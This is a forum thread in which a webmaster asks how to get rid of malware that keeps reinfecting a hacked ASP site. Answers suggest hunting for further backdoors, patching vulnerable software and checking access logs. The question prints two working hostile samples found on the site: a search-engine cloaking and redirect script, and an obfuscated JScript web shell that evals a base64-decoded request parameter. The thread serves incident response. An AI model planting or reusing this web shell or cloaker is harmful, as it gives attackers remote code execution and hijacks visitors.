# Site hacked - Malicious code - Imposible to permanently remove

Tags: security, malware, deobfuscation

I'm the web-admin of a website and few days ago, I realised the site had been hacked because when I use the `site:` operator search, it redirects to another website (redacted) which I've never seen before.

I've done some troubleshooting steps and I found some malicious files on the sites files. First one is a "default.asp" with the following code:

```
<%
On Error Resume Next
Function getAgent()
   Dim a,b,spider_array,i
   a=LCase(Request.ServerVariables("HTTP_USER_AGENT"))
   b=LCase(Request.ServerVariables("HTTP_FROM"))
   spider_array=array("google","yahoo","bing")
   getAgent=False
   For i=0 To ubound(spider_array)
   If Instr(a,spider_array(i))>0 And Instr(b,spider_array(i))>0 Then 
   getAgent=True
   Next
End Function
Function getReferrer()
   Dim page_from,search_array,i
   page_from=LCase(Request.ServerVariables("HTTP_REFERER"))
   search_array=array("google","yahoo","bing")
   getReferrer=False
   For i=0 To Ubound(search_array)
   If Instr(page_from,search_array(i))>0 Then getReferrer=True
   Next
End Function
If getReferrer Then
   Response.Redirect("redacted site url")
   Response.End
End If
If getAgent Then
%>
<!--#include virtual="/images/mirr.jpg"-->
<%
  Response.End
 End If
 %>
 <!--#include virtual="/index.html"-->
```

The second one was a picture, called **"mirr.jpg"**, which I never uploaded to the site files on the hosting.

And the third one, another tip.asp:

```
<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>

<%
popup(popup(System.Text.Encoding.Default.GetString(
System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJzeW15aGsiXQ=="))));
%>
```

So in order to clean the website, the best solution would be delete these three files from the hosting or upload a clean copy of the website, right? But here is the point, I changed the FTP password yesterday and then I uploaded a clean backup version of the site but today I've found these three files on the website again...

I also changed CHMOD permission of their directory so no new files could be created but it did not work because these files appears again today.

Could you guys please help me with that issue? What do you suggest to resolve that badware behavior?

Comment: Please use common sense and ***NOT include links to malicious/spam sites you've been redirected to***!!! I removed the links from your post. Regardless: this is off-topic. Not a programming question, more of a troubleshooting question. And really no way for someone to figure it out here without examining your computer.

Answer (score 0):

This is more of a sysadmin problem then programming. What's probably happening is a script is being called else where on your server, have a look for anything that's been added recently and have execute permissions. Don't know if you have a Windows or Linux box, but in most cases is best to just dump the server and restart with a fresh install of your chosen OS

Answer (score 0):

You got a worm, and either there is *another* [backdoor](http://labs.sucuri.net/?note=2016-07-29) you did not find and which is used to reinfect the site, or you have some other code which is vulnerable.

It is not likely that someone designed a worm specifically for you; you're probably using some ASP site (e.g. FooAspSite) or theme which has a vulnerability that is well known enough that an automatic infector has been developed for it.

Check the software site for a new version of FooAspSite or a security fix.

The site you referred to is an Italian e-shop and it looks like it might have been hacked, and now been cleaned, as you already observed (the file it redirected to is no longer there).

A code similar to your ASP has been seen [for PHP too](https://www.unphp.net/decode/2009e526f30f5f54e0bee9cd813d3fdc/), with a similar mechanism.

Some good pointers can be found in the answers [here](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) ("How do I deal with a compromised server").

To determine how "they" got back, you can try and check the access logs of the website, *possibly* around the creation time of the malicious files. Keep in mind that this time might be forged. Almost certainly the attackers attempted to visit one or more of the malicious files after reinstall; if you find accesses to those files, the accesses immediately before those, *perhaps* from the same IP addresses, *perhaps* not, are likely to be the ones that led to the compromise. You might notice an access to a rarely used plugin, or strange characters in the logs, or an anomalous response length or HTTP code.